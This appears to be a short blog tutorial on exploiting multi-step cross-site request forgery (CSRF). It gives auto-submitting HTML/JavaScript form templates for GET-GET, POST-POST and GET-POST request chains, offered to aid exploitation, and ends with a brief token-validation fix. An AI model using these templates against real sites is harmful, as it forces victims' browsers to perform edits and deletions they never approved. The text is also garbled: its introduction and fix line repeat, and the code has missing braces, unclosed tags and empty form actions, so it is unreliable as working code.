By Deepak Choudhary.
Exploiting a CSRF vulnerability that relies on a single request (GET/POST) is often a simple task, and tools like Burp make effort even easier. However, exploitation can become much more difficult when multiple requests are needed to exploit an CSRF vulnerability.
This is common with edit, add, and delete actions on a web page where a user has to confirm a change (e.g. "Are you sure you'd like to...?").
Multi-staged requests add an add level of complexity since they can be either GET Requests, POST Requests, or a combination of both. This makes it slightly more complicated to exploit in a single click.
The following are a few multi-staged CSRF templates that you can use to aid in exploitation.
Fixing CSR: Of course, CSRF token validation will save here. So random token (per request) should be there in every request form and validate at server side.
Exploiting a CSRF vulnerability that relies on a single request (GET/POST) is often a simple task, and tools like Burp make effort even easier. However, exploitation can become much more difficult when multiple requests are needed to exploit an CSRF vulnerability.
This is common with edit, add, and delete actions on a web page where a user has to confirm a change (e.g. "Are you sure you'd like to...?").
Multi-staged requests add an add level of complexity since they can be either GET Requests, POST Requests, or a combination of both. This makes it slightly more complicated to exploit in a single click.
The following are a few multi-staged CSRF templates that you can use to aid in exploitation.
GET-GET Requests
<script language="JavaScript">
function abc()
window.setTimeout( function () { document.forms[0].submit()}, 12000);
<body onload="abc();">
<form action="" method="GET">
<input type="submit" value="Submit request" />
POST-POST Requests
<form id="form1" method="POST" target="_blank" action="">
<input type="hidden" name="test1" value="1">
<input type="submit" value="form1">
<form id="form2" method="POST" target="_blank" action="">
<input type="hidden" name="test2" value="2">
<input type="submit" value="form2">
window.setTimeout( function () { document.forms.form2.submit()}, 12000);
GET-POST Requests
<script language="JavaScript">
function abc()
window.setTimeout( function () { document.forms[0].submit()}, 12000);
<body onload="abc();">
<form action="" method="POST">
<input type="hidden" name="parameter1 name " value="test1" />
<input type="hidden" name="parameter2 name" value="test2" />
<input type="submit" value="Submit request" />
Fixing CSR: Of course, CSRF token validation will save here. So random token (per request) should be there in every request form and validate at server side.